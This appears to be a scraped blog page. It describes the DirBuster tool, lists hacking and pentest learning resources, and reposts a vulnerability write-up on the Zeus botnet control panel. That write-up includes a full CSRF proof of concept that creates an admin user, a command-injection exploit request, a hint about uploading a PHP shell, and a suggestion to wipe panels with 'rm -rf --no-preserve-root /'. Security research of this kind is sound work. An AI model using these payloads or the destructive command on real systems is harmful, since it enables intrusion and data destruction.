SOUZ': 2023

Bruno Souza

"DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists (Further information can be found below), this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;) " read more...

Download: https://sourceforge.net/projects/dirbuster

Related articles

Bruno Souza

In this article, I'm going to provide you a list of resources which I have found very useful. I don't remember all of them from top of my head so I might miss some. This list will be updated on usual basis. Hope you'll find some good stuff to learn. If you have got suggestions leave them down below in the comments section.

Free Hands on Labs:

1. Hack The Box - live machines to hack your way around. Besides boxes they have awesome challenges and great labs to try out.

2. TryHackMe - great way to learn pentesting while doing it. Lots of machines to hack and lots of ground to cover.

3. Portswigger Web Security Academy - learn web application pentesting.

Free Training (Mostly Introductory stuff):

1. Tenable University - training and certification on Nessus etc.

2. Palo Alto Networks - Palo Alto Networks offers an abundance of resources to prepare for there certifications. The training is free but the exams cost.

3. Open P-TECH - has an introductory course on Cybersecurity Fundamentals.

4. IBM Security Learning Academy - has many courses but focused on IBM security services and

products.

5. Cisco Networking Academy - not all courses are free but Introduction to Cybersecurity and Cybersecurity Essentials are free.

6. AWS Training and Certification - has some free cloud security training courses.

7. Metasploit Unleashed - Free Online Ethical Hacking Course - Offensive Security's free online course on metasploit.

8. Coursera and Edx - you already know about them.

Blogs:

1. HackTricks - This is simply an awesome blog just visit it and you'll fall in love.

2. pentestmonkey - I visit it most of the time for one-liner reverse shells they are awesome.

3. Rasta Mouse

Writeups:

1. 0xdf

2. Snowscan

3. RootFlag.io

4. xct@vulndev

5. Rana Khalil

YouTube:

1. ippsec - an awesome YouTube channel with tons of information in every video. New video comes out weekly as soon as the machine on hackthebox expires. https://ippsec.rocks for video searching

2. xct - short walkthroughs on hackthebox machines.

3. Cristi Vlad - advice and content on pentesting and python.

4. LiveOverflow - reverse engineering on steroids.

5. SANS Pen Test Training - SANS institute webinars and talks.

6. VbScrub - great pentesting videos.

7. BinaryAdventure - great pentesting and reverse engineering videos.

8. GynvaelEN - great videos and talks about CTFs and pentesting.

GitHub Repos:

1. PayloadsAllTheThings - heaven of hackers.

2. Pentest Monkey - reverse shells and more.

Boring vulns found

Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
No password policy - admins can set up really weak passwords
No anti brute-force - you can try to guess the admin's password. Default username is admin
Password autocomplete enabled - boring
Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html>

MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
ClickJacking - really boring stuff
Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

The system directory is protected with .htaccess deny from all.
gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Páginas

segunda-feira, 5 de junho de 2023

DirBuster: Brute Force Web Directories

Learning Resources For Hacking And Pentesting

Free Hands on Labs:

Free Training (Mostly Introductory stuff):

Blogs:

Writeups:

YouTube:

GitHub Repos:

Related posts

domingo, 4 de junho de 2023

Attacking Financial Malware Botnet Panels - Zeus

Boring vulns found

Whats good news (for the C&C panel owners)

What's really bad news (for the C&C panel owners)

More articles

OSWA™

Quem sou eu

my o'clock

Arquivo do blog

Qual a melhor história de SIN WEEK?

visualizações deste blog

Seguidores